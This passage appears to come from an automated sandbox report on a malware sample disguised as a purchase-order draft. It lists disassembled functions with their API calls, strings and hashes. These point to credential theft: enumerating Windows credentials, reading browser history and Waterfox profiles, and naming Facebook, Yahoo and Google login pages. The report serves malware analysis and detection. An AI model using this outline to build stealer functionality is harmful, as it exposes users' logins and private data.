                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                • String ID:
                                                                                • API String ID: 3715365532-3916222277
                                                                                • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                • String ID: bhv
                                                                                • API String ID: 4234240956-2689659898
                                                                                • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                • API String ID: 2941347001-70141382
                                                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                • String ID: visited:
                                                                                • API String ID: 2470578098-1702587658
                                                                                • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                APIs
                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                • free.MSVCRT ref: 0040E28B
                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                • API String ID: 2804212203-2982631422
                                                                                • Opcode ID: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                • Opcode Fuzzy Hash: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                • String ID:
                                                                                • API String ID: 115830560-3916222277
                                                                                • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 free 845->850 846->845 850->830
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                • free.MSVCRT ref: 0041848B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile$ErrorLastfree
                                                                                • String ID: |A
                                                                                • API String ID: 77810686-1717621600
                                                                                • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041249C
                                                                                • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                • wcscpy.MSVCRT ref: 004125A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                • String ID: r!A
                                                                                • API String ID: 2791114272-628097481
                                                                                • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                APIs
                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                • API String ID: 2936932814-4196376884
                                                                                • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040A824
                                                                                • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID: C:\Windows\system32
                                                                                • API String ID: 669240632-2896066436
                                                                                • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                APIs
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                • wcsncmp.MSVCRT ref: 0040BE38
                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                • String ID:
                                                                                • API String ID: 697348961-0
                                                                                • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                • memset.MSVCRT ref: 00403D13
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                • API String ID: 4039892925-11920434
                                                                                • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
